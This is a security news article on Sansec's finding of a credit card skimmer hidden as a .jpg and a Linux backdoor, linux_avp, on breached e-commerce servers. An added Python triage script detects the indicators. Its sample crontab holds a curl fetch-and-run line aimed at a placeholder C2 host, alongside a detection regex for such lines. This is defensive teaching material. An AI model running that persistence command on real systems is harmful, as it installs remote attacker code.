Security researchers have discovered that attackers are also deploying a Linux backdoor to compromised e-commerce servers after injecting a credit card skimmer into online store websites.
The PHP-encoded web skimmer (a script designed to steal and exfiltrate payment and customer personal information) is added and camouflaged as a .JPG image file in the /app/design/frontend/ folder.
Attackers use this script to download and inject fake payment forms on the payment pages displayed to customers by the hacked online store.
“We discovered that the attacker started with automated e-commerce attack probes, testing dozens of weaknesses in common online store platforms,” the Sansec Threat Research team revealed.
“After a day and a half, the attacker found a file download vulnerability in one of the plugins in the store. He then downloaded a webshell and modified the server code to intercept customer data.”
Linux malware not detected by security software
The Golang-based malware, spotted by Dutch cybersecurity company Sansec on the same server, was downloaded and executed on breached servers as the linux_avp executable.
Once started, it immediately removes itself from disk and camouflages itself as a “ps -ef” process which would be used to get a list of running processes.
By analyzing the linux_avp backdoor, Sansec discovered that it was waiting for commands from a Beijing server hosted on Alibaba’s network.
They also found that the malware would gain persistence by adding a new crontab entry that would re-download the malicious payload from its command and control server and reinstall the backdoor if it is detected and removed or the server reboots.
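The three host-level indicators described above (a PHP skimmer stored under an image name in app/design/frontend/, a process that calls itself “ps -ef” but whose binary has been deleted from disk, and a cron entry that re-downloads and re-executes a payload) can be checked in a short triage script. The example below is added here and is not Sansec's tooling or the article's own code; all crontab lines, process records and file contents are constructed sample data, and the C2 host name is a placeholder.

```python
import os
import re
from typing import List, Sequence, Tuple

# Constructed sample crontab, not taken from the incident (host name is a placeholder).
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://c2.example.invalid/linux_avp -o /tmp/linux_avp && chmod +x /tmp/linux_avp && /tmp/linux_avp
"""

# Constructed process records as a collector would read /proc/<pid>/cmdline and /proc/<pid>/exe.
SAMPLE_PROCS: List[Tuple[int, str, str]] = [
    (1001, "ps -ef", "/usr/bin/ps"),
    (1002, "ps -ef", "/tmp/linux_avp (deleted)"),   # backdoor hiding behind a ps name
    (1003, "php-fpm: pool www", "/usr/sbin/php-fpm"),
]

# Constructed (path, leading bytes) pairs from a Magento app/design/frontend tree.
SAMPLE_FILES: List[Tuple[str, bytes]] = [
    ("app/design/frontend/Vendor/theme/web/images/logo.jpg", b"\xff\xd8\xff\xe0"),
    ("app/design/frontend/Vendor/theme/web/images/bg.jpg", b"<?php eval("),
]

# A cron job that fetches with curl/wget and then marks the file executable,
# pipes it to a shell, or runs it directly matches the re-install pattern above.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*(chmod\s+\+x|\|\s*(ba)?sh\b|&&\s*/)")

def suspicious_cron_entries(crontab_text: str) -> List[str]:
    """Return cron lines that download a payload and execute it."""
    return [line for line in crontab_text.splitlines()
            if line.strip() and not line.lstrip().startswith("#") and FETCH_AND_RUN.search(line)]

def masquerading_processes(procs: Sequence[Tuple[int, str, str]]) -> List[int]:
    """PIDs that present themselves as ps but whose binary is not ps or is gone from disk."""
    hits = []
    for pid, cmdline, exe in procs:
        if cmdline.split()[:1] != ["ps"]:
            continue
        deleted = exe.endswith("(deleted)")          # readlink of /proc/<pid>/exe for an unlinked binary
        real_name = os.path.basename(exe.replace(" (deleted)", ""))
        if deleted or real_name != "ps":
            hits.append(pid)
    return hits

def php_disguised_as_image(files: Sequence[Tuple[str, bytes]]) -> List[str]:
    """Paths with an image extension whose content starts with a PHP open tag instead of image magic."""
    return [path for path, head in files
            if path.lower().endswith((".jpg", ".jpeg", ".png", ".gif"))
            and head.lstrip().startswith(b"<?php")]

if __name__ == "__main__":
    print("cron:", suspicious_cron_entries(SAMPLE_CRONTAB))
    print("procs:", masquerading_processes(SAMPLE_PROCS))
    print("files:", php_disguised_as_image(SAMPLE_FILES))
```

On a live host the same functions can be fed from `crontab -l` output for every user, `/proc/<pid>/cmdline` and `os.readlink('/proc/<pid>/exe')`, and the first bytes of each file under app/design/frontend/.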
So far, this backdoor has not been detected by anti-malware engines on VirusTotal even though a sample was first uploaded over a month ago on October 8.
The uploader could be the creator of linux_avp, since the sample was submitted a day after researchers at Dutch cybersecurity company Sansec spotted it while investigating the e-commerce site breach.